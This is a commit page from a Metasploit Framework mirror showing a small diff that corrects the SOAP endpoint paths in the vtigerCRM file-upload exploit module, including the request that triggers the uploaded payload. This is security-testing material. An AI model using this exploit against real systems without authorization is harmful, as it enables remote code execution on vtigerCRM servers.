infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #2998, @bit4bit's fix for the vtigercrm exploit

bug/bundler_fix
jvazquez-r7 2014-02-20 08:36:05 -06:00
parent 0b5e617236 0b27cd13e8
commit 998fa06912
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 3 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
modules/exploits/multi/http/vtiger_soap_upload.rb
View File

@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
print_status("#{peer} - Executing payload...") print_status("#{peer} - Executing payload...")
send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0) send_request_cgi({'uri' => normalize_uri(target_uri.path, file_name)}, 0)
end end
def add_attachment_soap(file_name, file_data) def add_attachment_soap(file_name, file_data)
@ -170,8 +170,9 @@ class Metasploit3 < Msf::Exploit::Remote
def send_soap_request(soap_data) def send_soap_request(soap_data)
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'), 'uri' => normalize_uri(target_uri.path, 'vtigerservice.php'),
'method' => 'POST', 'method' => 'POST',
'vars_get' => { 'service' => 'outlook' },
'ctype' => 'text/xml; charset=UTF-8', 'ctype' => 'text/xml; charset=UTF-8',
'data' => soap_data 'data' => soap_data
}) })